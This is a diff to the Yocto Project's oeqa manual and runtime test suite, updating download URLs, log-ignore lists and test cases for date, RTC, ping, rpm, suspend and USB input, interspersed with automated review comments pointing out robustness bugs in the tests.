47 "action": "wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/qemu (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n", 47 "action": "wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/ (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n",
48 "expected_results": " Qemu can be lauched normally." 48 "expected_results": " Qemu can be lauched normally."
49 }, 49 },
50 "3": { 50 "3": {
@@ -60,7 +60,7 @@
60 "expected_results": "" 60 "expected_results": ""
61 }, 61 },
62 "6": { 62 "6": {
63 "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n", 63 "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n",
64 "expected_results": "" 64 "expected_results": ""
65 }, 65 },
66 "7": { 66 "7": {
@@ -247,7 +247,7 @@
247 "execution": { 247 "execution": {
248 "1": { 248 "1": {
249 "action": "Clone eclipse-poky source. \n \n - git clone git://git.yoctoproject.org/eclipse-poky \n\n", 249 "action": "Clone eclipse-poky source. \n \n - git clone git://git.yoctoproject.org/eclipse-poky \n\n",
250 "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on http://autobuilder.yoctoproject.org/pub/releases/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n" 250 "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on https://downloads.yoctoproject.org/releases/yocto/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n"
251 }, 251 },
252 "2": { 252 "2": {
253 "action": "Checkout correct tag. \n\n - git checkout <eclipse-version>/<yocto-version> \n\n", 253 "action": "Checkout correct tag. \n\n - git checkout <eclipse-version>/<yocto-version> \n\n",
diff --git a/meta/lib/oeqa/manual/toaster-managed-mode.json b/meta/lib/oeqa/manual/toaster-managed-mode.json
index 12374c7c64..9566d9d10e 100644
--- a/meta/lib/oeqa/manual/toaster-managed-mode.json
+++ b/meta/lib/oeqa/manual/toaster-managed-mode.json
@@ -136,7 +136,7 @@
136 "expected_results": "" 136 "expected_results": ""
137 }, 137 },
138 "3": { 138 "3": {
139 "action": "Check that default values are as follows: \n\tDISTRO - poky \n\tIMAGE_FSTYPES - ext3 jffs2 tar.bz2 \n\tIMAGE_INSTALL_append - \"Not set\" \n\tPACKAGE_CLASES - package_rpm \n SSTATE_DIR - /homeDirectory/poky/sstate-cache \n\n", 139 "action": "Check that default values are as follows: \n\tDISTRO - poky \n\tIMAGE_FSTYPES - ext3 jffs2 tar.bz2 \n\tIMAGE_INSTALL_append - \"Not set\" \n\tPACKAGE_CLASSES - package_rpm \n SSTATE_DIR - /homeDirectory/poky/sstate-cache \n\n",
140 "expected_results": "" 140 "expected_results": ""
141 }, 141 },
142 "4": { 142 "4": {
diff --git a/meta/lib/oeqa/runtime/cases/date.py b/meta/lib/oeqa/runtime/cases/date.py
index fdd2a6ae58..bd6537400e 100644
--- a/meta/lib/oeqa/runtime/cases/date.py
+++ b/meta/lib/oeqa/runtime/cases/date.py
@@ -13,12 +13,12 @@ class DateTest(OERuntimeTestCase):
13 def setUp(self): 13 def setUp(self):
14 if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd': 14 if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
15 self.logger.debug('Stopping systemd-timesyncd daemon') 15 self.logger.debug('Stopping systemd-timesyncd daemon')
16 self.target.run('systemctl disable --now systemd-timesyncd') 16 self.target.run('systemctl disable --now --runtime systemd-timesyncd')
17 17
18 def tearDown(self): 18 def tearDown(self):
19 if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd': 19 if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
20 self.logger.debug('Starting systemd-timesyncd daemon') 20 self.logger.debug('Starting systemd-timesyncd daemon')
21 self.target.run('systemctl enable --now systemd-timesyncd') 21 self.target.run('systemctl enable --now --runtime systemd-timesyncd')
22 22
23 @OETestDepends(['ssh.SSHTest.test_ssh']) 23 @OETestDepends(['ssh.SSHTest.test_ssh'])
24 @OEHasPackage(['coreutils', 'busybox']) 24 @OEHasPackage(['coreutils', 'busybox'])
@@ -28,14 +28,13 @@ class DateTest(OERuntimeTestCase):
28 self.assertEqual(status, 0, msg=msg) 28 self.assertEqual(status, 0, msg=msg)
29 oldDate = output 29 oldDate = output
30 30
31 sampleDate = '"2016-08-09 10:00:00"' 31 sampleTimestamp = 1488800000
32 (status, output) = self.target.run("date -s %s" % sampleDate) 32 (status, output) = self.target.run("date -s @%d" % sampleTimestamp)
33 self.assertEqual(status, 0, msg='Date set failed, output: %s' % output) 33 self.assertEqual(status, 0, msg='Date set failed, output: %s' % output)
34 34
35 (status, output) = self.target.run("date -R") 35 (status, output) = self.target.run('date +"%s"')
36 p = re.match('Tue, 09 Aug 2016 10:00:.. \+0000', output)
37 msg = 'The date was not set correctly, output: %s' % output 36 msg = 'The date was not set correctly, output: %s' % output
38 self.assertTrue(p, msg=msg) 37 self.assertTrue(int(output) - sampleTimestamp < 300, msg=msg)
39 38
40 (status, output) = self.target.run('date -s "%s"' % oldDate) 39 (status, output) = self.target.run('date -s "%s"' % oldDate)
41 msg = 'Failed to reset date, output: %s' % output 40 msg = 'Failed to reset date, output: %s' % output
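Review bot: The new check `int(output) - sampleTimestamp < 300` has no lower bound, so any clock value earlier than `sampleTimestamp` gives a negative difference and passes. It also never looks at `status` from the `date +"%s"` call, and a non-numeric `output` surfaces as a `ValueError` rather than as a test failure with `msg`. Use `self.assertEqual(status, 0, msg=msg)` followed by `self.assertTrue(0 <= int(output) - sampleTimestamp < 300, msg=msg)`. The test method starts before the hunk and continues after it.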
diff --git a/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py b/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py
new file mode 100644
index 0000000000..e010612838
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py
@@ -0,0 +1,36 @@
1from oeqa.runtime.case import OERuntimeTestCase
2from oeqa.core.decorator.depends import OETestDepends
3from oeqa.core.decorator.data import skipIfQemu
4
5class Ethernet_Test(OERuntimeTestCase):
6
7 def set_ip(self, x):
8 x = x.split(".")
9 sample_host_address = '150'
10 x[3] = sample_host_address
11 x = '.'.join(x)
12 return x
13
14 @skipIfQemu('qemuall', 'Test only runs on real hardware')
15 @OETestDepends(['ssh.SSHTest.test_ssh'])
16 def test_set_virtual_ip(self):
17 (status, output) = self.target.run("ifconfig eth0 | grep 'inet ' | awk '{print $2}'")
18 self.assertEqual(status, 0, msg='Failed to get ip address. Make sure you have an ethernet connection on your device, output: %s' % output)
19 original_ip = output
20 virtual_ip = self.set_ip(original_ip)
21
22 (status, output) = self.target.run("ifconfig eth0:1 %s netmask 255.255.255.0 && sleep 2 && ping -c 5 %s && ifconfig eth0:1 down" % (virtual_ip,virtual_ip))
23 self.assertEqual(status, 0, msg='Failed to create virtual ip address, output: %s' % output)
24
25 @OETestDepends(['ethernet_ip_connman.Ethernet_Test.test_set_virtual_ip'])
26 def test_get_ip_from_dhcp(self):
27 (status, output) = self.target.run("connmanctl services | grep -E '*AO Wired|*AR Wired' | awk '{print $3}'")
28 self.assertEqual(status, 0, msg='No wired interfaces are detected, output: %s' % output)
29 wired_interfaces = output
30
31 (status, output) = self.target.run("ip route | grep default | awk '{print $3}'")
32 self.assertEqual(status, 0, msg='Failed to retrieve the default gateway, output: %s' % output)
33 default_gateway = output
34
35 (status, output) = self.target.run("connmanctl config %s --ipv4 dhcp && sleep 2 && ping -c 5 %s" % (wired_interfaces,default_gateway))
36 self.assertEqual(status, 0, msg='Failed to get dynamic IP address via DHCP in connmand, output: %s' % output) \ No newline at end of file
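Review bot: In `test_set_virtual_ip` and `test_get_ip_from_dhcp` every lookup pipeline ends in `awk`, so unless the target shell runs with pipefail, `status` is awk's exit status and stays 0 when `grep` matched nothing. The `assertEqual(status, 0, ...)` checks therefore do not detect a missing address, interface or gateway. An empty `output` then reaches `set_ip()`, where `x[3]` raises `IndexError`, or is interpolated into the `ifconfig`/`connmanctl` command line as an empty or multi-line argument. Add `self.assertTrue(output.strip(), msg=...)` after each lookup and check `len(x) == 4` in `set_ip` before assigning. The `grep -E` pattern also starts each alternative with `*`, whose meaning at the start of an extended regular expression is not defined; escape the asterisk if a literal match is meant.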
diff --git a/meta/lib/oeqa/runtime/cases/ksample.py b/meta/lib/oeqa/runtime/cases/ksample.py
index a9a1620ebd..9883aa9aa8 100644
--- a/meta/lib/oeqa/runtime/cases/ksample.py
+++ b/meta/lib/oeqa/runtime/cases/ksample.py
@@ -10,7 +10,7 @@ from oeqa.core.decorator.depends import OETestDepends
10from oeqa.core.decorator.data import skipIfNotFeature 10from oeqa.core.decorator.data import skipIfNotFeature
11 11
12# need some kernel fragments 12# need some kernel fragments
13# echo "KERNEL_FEATURES_append += \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf 13# echo "KERNEL_FEATURES_append = \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf
14class KSample(OERuntimeTestCase): 14class KSample(OERuntimeTestCase):
15 def cmd_and_check(self, cmd='', match_string=''): 15 def cmd_and_check(self, cmd='', match_string=''):
16 status, output = self.target.run(cmd) 16 status, output = self.target.run(cmd)
diff --git a/meta/lib/oeqa/runtime/cases/ltp.py b/meta/lib/oeqa/runtime/cases/ltp.py
index a66d5d13d7..879f2a673c 100644
--- a/meta/lib/oeqa/runtime/cases/ltp.py
+++ b/meta/lib/oeqa/runtime/cases/ltp.py
@@ -67,7 +67,7 @@ class LtpTest(LtpTestBase):
67 def runltp(self, ltp_group): 67 def runltp(self, ltp_group):
68 cmd = '/opt/ltp/runltp -f %s -p -q -r /opt/ltp -l /opt/ltp/results/%s -I 1 -d /opt/ltp' % (ltp_group, ltp_group) 68 cmd = '/opt/ltp/runltp -f %s -p -q -r /opt/ltp -l /opt/ltp/results/%s -I 1 -d /opt/ltp' % (ltp_group, ltp_group)
69 starttime = time.time() 69 starttime = time.time()
70 (status, output) = self.target.run(cmd) 70 (status, output) = self.target.run(cmd, timeout=1200)
71 endtime = time.time() 71 endtime = time.time()
72 72
73 with open(os.path.join(self.ltptest_log_dir, "%s-raw.log" % ltp_group), 'w') as f: 73 with open(os.path.join(self.ltptest_log_dir, "%s-raw.log" % ltp_group), 'w') as f:
diff --git a/meta/lib/oeqa/runtime/cases/pam.py b/meta/lib/oeqa/runtime/cases/pam.py
index 271a1943e3..a482ded945 100644
--- a/meta/lib/oeqa/runtime/cases/pam.py
+++ b/meta/lib/oeqa/runtime/cases/pam.py
@@ -8,11 +8,14 @@
8from oeqa.runtime.case import OERuntimeTestCase 8from oeqa.runtime.case import OERuntimeTestCase
9from oeqa.core.decorator.depends import OETestDepends 9from oeqa.core.decorator.depends import OETestDepends
10from oeqa.core.decorator.data import skipIfNotFeature 10from oeqa.core.decorator.data import skipIfNotFeature
11from oeqa.runtime.decorator.package import OEHasPackage
11 12
12class PamBasicTest(OERuntimeTestCase): 13class PamBasicTest(OERuntimeTestCase):
13 14
14 @skipIfNotFeature('pam', 'Test requires pam to be in DISTRO_FEATURES') 15 @skipIfNotFeature('pam', 'Test requires pam to be in DISTRO_FEATURES')
15 @OETestDepends(['ssh.SSHTest.test_ssh']) 16 @OETestDepends(['ssh.SSHTest.test_ssh'])
17 @OEHasPackage(['shadow'])
18 @OEHasPackage(['shadow-base'])
16 def test_pam(self): 19 def test_pam(self):
17 status, output = self.target.run('login --help') 20 status, output = self.target.run('login --help')
18 msg = ('login command does not work as expected. ' 21 msg = ('login command does not work as expected. '
diff --git a/meta/lib/oeqa/runtime/cases/parselogs.py b/meta/lib/oeqa/runtime/cases/parselogs.py
index a1791b5cca..1cac59725d 100644
--- a/meta/lib/oeqa/runtime/cases/parselogs.py
+++ b/meta/lib/oeqa/runtime/cases/parselogs.py
@@ -32,7 +32,7 @@ common_errors = [
32 "Failed to load module \"fbdev\"", 32 "Failed to load module \"fbdev\"",
33 "Failed to load module fbdev", 33 "Failed to load module fbdev",
34 "Failed to load module glx", 34 "Failed to load module glx",
35 "[drm] Cannot find any crtc or sizes - going 1024x768", 35 "[drm] Cannot find any crtc or sizes",
36 "_OSC failed (AE_NOT_FOUND); disabling ASPM", 36 "_OSC failed (AE_NOT_FOUND); disabling ASPM",
37 "Open ACPI failed (/var/run/acpid.socket) (No such file or directory)", 37 "Open ACPI failed (/var/run/acpid.socket) (No such file or directory)",
38 "NX (Execute Disable) protection cannot be enabled: non-PAE kernel!", 38 "NX (Execute Disable) protection cannot be enabled: non-PAE kernel!",
@@ -61,6 +61,8 @@ common_errors = [
61 "[rdrand]: Initialization Failed", 61 "[rdrand]: Initialization Failed",
62 "[pulseaudio] authkey.c: Failed to open cookie file", 62 "[pulseaudio] authkey.c: Failed to open cookie file",
63 "[pulseaudio] authkey.c: Failed to load authentication key", 63 "[pulseaudio] authkey.c: Failed to load authentication key",
64 "was skipped because of a failed condition check",
65 "was skipped because all trigger condition checks failed",
64 ] 66 ]
65 67
66video_related = [ 68video_related = [
@@ -88,6 +90,9 @@ qemux86_common = [
88 'tsc: HPET/PMTIMER calibration failed', 90 'tsc: HPET/PMTIMER calibration failed',
89 "modeset(0): Failed to initialize the DRI2 extension", 91 "modeset(0): Failed to initialize the DRI2 extension",
90 "glamor initialization failed", 92 "glamor initialization failed",
93 "blk_update_request: I/O error, dev fd0, sector 0 op 0x0:(READ)",
94 "floppy: error",
95 'failed to IDENTIFY (I/O error, err_mask=0x4)',
91] + common_errors 96] + common_errors
92 97
93ignore_errors = { 98ignore_errors = {
@@ -293,7 +298,7 @@ class ParseLogsTest(OERuntimeTestCase):
293 grepcmd = 'grep ' 298 grepcmd = 'grep '
294 grepcmd += '-Ei "' 299 grepcmd += '-Ei "'
295 for error in errors: 300 for error in errors:
296 grepcmd += '\<' + error + '\>' + '|' 301 grepcmd += r'\<' + error + r'\>' + '|'
297 grepcmd = grepcmd[:-1] 302 grepcmd = grepcmd[:-1]
298 grepcmd += '" ' + str(log) + " | grep -Eiv \'" 303 grepcmd += '" ' + str(log) + " | grep -Eiv \'"
299 304
@@ -304,13 +309,13 @@ class ParseLogsTest(OERuntimeTestCase):
304 errorlist = ignore_errors['default'] 309 errorlist = ignore_errors['default']
305 310
306 for ignore_error in errorlist: 311 for ignore_error in errorlist:
307 ignore_error = ignore_error.replace('(', '\(') 312 ignore_error = ignore_error.replace('(', r'\(')
308 ignore_error = ignore_error.replace(')', '\)') 313 ignore_error = ignore_error.replace(')', r'\)')
309 ignore_error = ignore_error.replace("'", '.') 314 ignore_error = ignore_error.replace("'", '.')
310 ignore_error = ignore_error.replace('?', '\?') 315 ignore_error = ignore_error.replace('?', r'\?')
311 ignore_error = ignore_error.replace('[', '\[') 316 ignore_error = ignore_error.replace('[', r'\[')
312 ignore_error = ignore_error.replace(']', '\]') 317 ignore_error = ignore_error.replace(']', r'\]')
313 ignore_error = ignore_error.replace('*', '\*') 318 ignore_error = ignore_error.replace('*', r'\*')
314 ignore_error = ignore_error.replace('0-9', '[0-9]') 319 ignore_error = ignore_error.replace('0-9', '[0-9]')
315 grepcmd += ignore_error + '|' 320 grepcmd += ignore_error + '|'
316 grepcmd = grepcmd[:-1] 321 grepcmd = grepcmd[:-1]
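Review bot: The entries added to `common_errors` and `qemux86_common` are matched as unanchored, case-insensitive substrings by the `grep -Eiv` built further down, and shortening `"[drm] Cannot find any crtc or sizes - going 1024x768"` to `"[drm] Cannot find any crtc or sizes"` widens what is dropped from the report. Each new ignore should carry a comment naming the component that emits it and why it is harmless, e.g. `# systemd: unit skipped by a Condition check, not an error` above the two `"was skipped because ..."` strings, if that is their source. The escaping chain in the last hunk is now written with raw strings but still leaves `.`, `|`, `+`, `{`, `^` and `$` unescaped, so an ignore string containing them matches more than its literal text. The `error` values in the first loop are not escaped at all.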
diff --git a/meta/lib/oeqa/runtime/cases/ping.py b/meta/lib/oeqa/runtime/cases/ping.py
index f6603f75ec..498f80d0a5 100644
--- a/meta/lib/oeqa/runtime/cases/ping.py
+++ b/meta/lib/oeqa/runtime/cases/ping.py
@@ -6,6 +6,7 @@ from subprocess import Popen, PIPE
6 6
7from oeqa.runtime.case import OERuntimeTestCase 7from oeqa.runtime.case import OERuntimeTestCase
8from oeqa.core.decorator.oetimeout import OETimeout 8from oeqa.core.decorator.oetimeout import OETimeout
9from oeqa.core.exception import OEQATimeoutError
9 10
10class PingTest(OERuntimeTestCase): 11class PingTest(OERuntimeTestCase):
11 12
@@ -13,14 +14,17 @@ class PingTest(OERuntimeTestCase):
13 def test_ping(self): 14 def test_ping(self):
14 output = '' 15 output = ''
15 count = 0 16 count = 0
16 while count < 5: 17 try:
17 cmd = 'ping -c 1 %s' % self.target.ip 18 while count < 5:
18 proc = Popen(cmd, shell=True, stdout=PIPE) 19 cmd = 'ping -c 1 %s' % self.target.ip
19 output += proc.communicate()[0].decode('utf-8') 20 proc = Popen(cmd, shell=True, stdout=PIPE)
20 if proc.poll() == 0: 21 output += proc.communicate()[0].decode('utf-8')
21 count += 1 22 if proc.poll() == 0:
22 else: 23 count += 1
23 count = 0 24 else:
25 count = 0
26 except OEQATimeoutError:
27 self.fail("Ping timeout error for address %s, count %s, output: %s" % (self.target.ip, count, output))
24 msg = ('Expected 5 consecutive, got %d.\n' 28 msg = ('Expected 5 consecutive, got %d.\n'
25 'ping output is:\n%s' % (count,output)) 29 'ping output is:\n%s' % (count,output))
26 self.assertEqual(count, 5, msg = msg) 30 self.assertEqual(count, 5, msg = msg)
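Review bot: The re-indented loop still runs `'ping -c 1 %s' % self.target.ip` through `Popen(..., shell=True)`, so the address string is parsed by a shell. Passing an argument list avoids that and needs no quoting: `proc = Popen(['ping', '-c', '1', self.target.ip], stdout=PIPE)`. When `OEQATimeoutError` interrupts `proc.communicate()`, the new handler calls `self.fail()` without terminating or reaping the child, so a `ping` process may be left behind. Calling `proc.kill()` and `proc.wait()` in the handler, with `proc = None` set before the loop and checked first, would cover it.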
diff --git a/meta/lib/oeqa/runtime/cases/rpm.py b/meta/lib/oeqa/runtime/cases/rpm.py
index 8e18b426f8..203fcc8505 100644
--- a/meta/lib/oeqa/runtime/cases/rpm.py
+++ b/meta/lib/oeqa/runtime/cases/rpm.py
@@ -49,21 +49,20 @@ class RpmBasicTest(OERuntimeTestCase):
49 msg = 'status: %s. Cannot run rpm -qa: %s' % (status, output) 49 msg = 'status: %s. Cannot run rpm -qa: %s' % (status, output)
50 self.assertEqual(status, 0, msg=msg) 50 self.assertEqual(status, 0, msg=msg)
51 51
52 def check_no_process_for_user(u): 52 def wait_for_no_process_for_user(u, timeout = 120):
53 _, output = self.target.run(self.tc.target_cmds['ps']) 53 timeout_at = time.time() + timeout
54 if u + ' ' in output: 54 while time.time() < timeout_at:
55 return False 55 _, output = self.target.run(self.tc.target_cmds['ps'])
56 else: 56 if u + ' ' not in output:
57 return True 57 return
58 time.sleep(1)
59 user_pss = [ps for ps in output.split("\n") if u + ' ' in ps]
60 msg = "User %s has processes still running: %s" % (u, "\n".join(user_pss))
61 self.fail(msg=msg)
58 62
59 def unset_up_test_user(u): 63 def unset_up_test_user(u):
60 # ensure no test1 process in running 64 # ensure no test1 process in running
61 timeout = time.time() + 30 65 wait_for_no_process_for_user(u)
62 while time.time() < timeout:
63 if check_no_process_for_user(u):
64 break
65 else:
66 time.sleep(1)
67 status, output = self.target.run('userdel -r %s' % u) 66 status, output = self.target.run('userdel -r %s' % u)
68 msg = 'Failed to erase user: %s' % output 67 msg = 'Failed to erase user: %s' % output
69 self.assertTrue(status == 0, msg=msg) 68 self.assertTrue(status == 0, msg=msg)
@@ -141,13 +140,4 @@ class RpmInstallRemoveTest(OERuntimeTestCase):
141 140
142 self.tc.target.run('rm -f %s' % self.dst) 141 self.tc.target.run('rm -f %s' % self.dst)
143 142
144 # if using systemd this should ensure all entries are flushed to /var
145 status, output = self.target.run("journalctl --sync")
146 # Get the amount of entries in the log file
147 status, output = self.target.run(check_log_cmd)
148 msg = 'Failed to get the final size of the log file.'
149 self.assertEqual(0, status, msg=msg)
150 143
151 # Check that there's enough of them
152 self.assertGreaterEqual(int(output), 80,
153 'Cound not find sufficient amount of rpm entries in /var/log/messages, found {} entries'.format(output))
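Review bot: `wait_for_no_process_for_user()` decides with `u + ' ' in output`, a substring test over the whole `ps` listing, so a longer user name ending in `u`, or a command line that mentions it, keeps the loop waiting for the full 120 seconds and then fails the test. Comparing the user column of each line would avoid that, but the `ps` format comes from `self.tc.target_cmds['ps']` and is not visible here, so at least add a comment stating the assumption. `output` is bound only inside the `while` body, so with a `timeout` of 0 or less the list comprehension after the loop raises `NameError`; `output = ''` before the loop prevents that. The enclosing test method starts outside the hunk.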
diff --git a/meta/lib/oeqa/runtime/cases/rtc.py b/meta/lib/oeqa/runtime/cases/rtc.py
new file mode 100644
index 0000000000..39f4d29f23
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/rtc.py
@@ -0,0 +1,40 @@
1from oeqa.runtime.case import OERuntimeTestCase
2from oeqa.core.decorator.depends import OETestDepends
3from oeqa.core.decorator.data import skipIfFeature
4from oeqa.runtime.decorator.package import OEHasPackage
5
6import re
7
8class RTCTest(OERuntimeTestCase):
9
10 def setUp(self):
11 if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
12 self.logger.debug('Stopping systemd-timesyncd daemon')
13 self.target.run('systemctl disable --now --runtime systemd-timesyncd')
14
15 def tearDown(self):
16 if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
17 self.logger.debug('Starting systemd-timesyncd daemon')
18 self.target.run('systemctl enable --now --runtime systemd-timesyncd')
19
20 @skipIfFeature('read-only-rootfs',
21 'Test does not work with read-only-rootfs in IMAGE_FEATURES')
22 @OETestDepends(['ssh.SSHTest.test_ssh'])
23 @OEHasPackage(['coreutils', 'busybox'])
24 def test_rtc(self):
25 (status, output) = self.target.run('hwclock -r')
26 self.assertEqual(status, 0, msg='Failed to get RTC time, output: %s' % output)
27
28 (status, current_datetime) = self.target.run('date +"%m%d%H%M%Y"')
29 self.assertEqual(status, 0, msg='Failed to get system current date & time, output: %s' % current_datetime)
30
31 example_datetime = '062309452008'
32 (status, output) = self.target.run('date %s ; hwclock -w ; hwclock -r' % example_datetime)
33 check_hwclock = re.search('2008-06-23 09:45:..', output)
34 self.assertTrue(check_hwclock, msg='The RTC time was not set correctly, output: %s' % output)
35
36 (status, output) = self.target.run('date %s' % current_datetime)
37 self.assertEqual(status, 0, msg='Failed to reset system date & time, output: %s' % output)
38
39 (status, output) = self.target.run('hwclock -w')
40 self.assertEqual(status, 0, msg='Failed to reset RTC time, output: %s' % output)
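Review bot: `test_rtc` restores the system date and the RTC only after `self.assertTrue(check_hwclock, ...)`, so when that assertion fails the target is left with its clock in 2008 for every later test, which affects anything that depends on timestamps or certificate validity. Put the assertion inside a `try` whose `finally` runs `date %s` with `current_datetime` and then `hwclock -w`, so the restore happens on every path. The `status` of the combined `date %s ; hwclock -w ; hwclock -r` command is never checked either, and because the parts are joined with `;`, a failing `date` or `hwclock -w` does not stop the sequence. Joining them with `&&` and adding `self.assertEqual(status, 0, ...)` would make that failure visible.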
diff --git a/meta/lib/oeqa/runtime/cases/scp.py b/meta/lib/oeqa/runtime/cases/scp.py
index 3a5f292152..f2bbc947d6 100644
--- a/meta/lib/oeqa/runtime/cases/scp.py
+++ b/meta/lib/oeqa/runtime/cases/scp.py
@@ -23,7 +23,7 @@ class ScpTest(OERuntimeTestCase):
23 os.remove(cls.tmp_path) 23 os.remove(cls.tmp_path)
24 24
25 @OETestDepends(['ssh.SSHTest.test_ssh']) 25 @OETestDepends(['ssh.SSHTest.test_ssh'])
26 @OEHasPackage(['openssh-scp', 'dropbear']) 26 @OEHasPackage(['openssh-scp'])
27 def test_scp_file(self): 27 def test_scp_file(self):
28 dst = '/tmp/test_scp_file' 28 dst = '/tmp/test_scp_file'
29 29
diff --git a/meta/lib/oeqa/runtime/cases/suspend.py b/meta/lib/oeqa/runtime/cases/suspend.py
new file mode 100644
index 0000000000..67b6f7e56f
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/suspend.py
@@ -0,0 +1,33 @@
1from oeqa.runtime.case import OERuntimeTestCase
2from oeqa.core.decorator.depends import OETestDepends
3from oeqa.core.decorator.data import skipIfQemu
4import threading
5import time
6
7class Suspend_Test(OERuntimeTestCase):
8
9 def test_date(self):
10 (status, output) = self.target.run('date')
11 self.assertEqual(status, 0, msg = 'Failed to run date command, output : %s' % output)
12
13 def test_ping(self):
14 t_thread = threading.Thread(target=self.target.run, args=("ping 8.8.8.8",))
15 t_thread.start()
16 time.sleep(2)
17
18 status, output = self.target.run('pidof ping')
19 self.target.run('kill -9 %s' % output)
20 self.assertEqual(status, 0, msg = 'Not able to find process that runs ping, output : %s' % output)
21
22 def set_suspend(self):
23 (status, output) = self.target.run('sudo rtcwake -m mem -s 10')
24 self.assertEqual(status, 0, msg = 'Failed to suspends your system to RAM, output : %s' % output)
25
26 @skipIfQemu('qemuall', 'Test only runs on real hardware')
27 @OETestDepends(['ssh.SSHTest.test_ssh'])
28 def test_suspend(self):
29 self.test_date()
30 self.test_ping()
31 self.set_suspend()
32 self.test_date()
33 self.test_ping()
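Review bot: `test_date` and `test_ping` are written as helpers for `test_suspend`, but their `test_` prefix means a unittest-style loader also collects them as standalone tests, without `@skipIfQemu` or `@OETestDepends(['ssh.SSHTest.test_ssh'])`. Renaming them to `_check_date` and `_check_ping` keeps them out of discovery. `test_ping` pings the hard-coded public address `8.8.8.8`, so the result depends on the lab network having outbound internet access; the default gateway or a configurable address would be more predictable. In the same method `kill -9 %s` runs before `status` from `pidof ping` is asserted, so an empty or multi-PID `output` is interpolated into the command, and the background thread is never joined. `set_suspend` calls `sudo`, which assumes that package is present on the image.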
diff --git a/meta/lib/oeqa/runtime/cases/terminal.py b/meta/lib/oeqa/runtime/cases/terminal.py
new file mode 100644
index 0000000000..8fcca99f47
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/terminal.py
@@ -0,0 +1,21 @@
1from oeqa.runtime.case import OERuntimeTestCase
2from oeqa.core.decorator.depends import OETestDepends
3from oeqa.runtime.decorator.package import OEHasPackage
4
5import threading
6import time
7
8class TerminalTest(OERuntimeTestCase):
9
10 @OEHasPackage(['matchbox-terminal'])
11 @OETestDepends(['ssh.SSHTest.test_ssh'])
12 def test_terminal_running(self):
13 t_thread = threading.Thread(target=self.target.run, args=("export DISPLAY=:0 && matchbox-terminal -e 'sh -c \"uname -a && exec sh\"'",))
14 t_thread.start()
15 time.sleep(2)
16
17 status, output = self.target.run('pidof matchbox-terminal')
18 number_of_terminal = len(output.split())
19 self.assertEqual(number_of_terminal, 1, msg='There should be only one terminal being launched. Number of terminal launched : %s' % number_of_terminal)
20 self.target.run('kill -9 %s' % output)
21 self.assertEqual(status, 0, msg='Not able to find process that runs terminal.')
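Review bot: In `test_terminal_running` the count assertion comes before `kill -9 %s`, so whenever the number of `matchbox-terminal` processes is not exactly one, the test fails and leaves the terminal, and the thread blocked in `self.target.run`, behind on the target. The final `assertEqual(status, 0, ...)` is also effectively unreachable in the case it describes, since a failed `pidof` gives an empty `output` and the count assertion fires first. Assert `status` first, then put the count assertion in a `try` whose `finally` runs the `kill` and `t_thread.join()` with a timeout. That way cleanup happens on every path.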
diff --git a/meta/lib/oeqa/runtime/cases/usb_hid.py b/meta/lib/oeqa/runtime/cases/usb_hid.py
new file mode 100644
index 0000000000..3c292cf661
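--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/usb_hid.py
@@ -0,0 +1,22 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfQemu
+from oeqa.runtime.decorator.package import OEHasPackage
+
+class USB_HID_Test(OERuntimeTestCase):
+
+ def keyboard_mouse_simulation(self):
+ (status, output) = self.target.run('export DISPLAY=:0 && xdotool key F2 && xdotool mousemove 100 100')
+ return self.assertEqual(status, 0, msg = 'Failed to simulate keyboard/mouse input event, output : %s' % output)
+
+ def set_suspend(self):
+ (status, output) = self.target.run('sudo rtcwake -m mem -s 10')
+ return self.assertEqual(status, 0, msg = 'Failed to suspends your system to RAM, output : %s' % output)
+
+ @OEHasPackage(['xdotool'])
+ @skipIfQemu('qemuall', 'Test only runs on real hardware')
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ def test_USB_Hid_input(self):
+ self.keyboard_mouse_simulation()
+ self.set_suspend()
+ self.keyboard_mouse_simulation()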
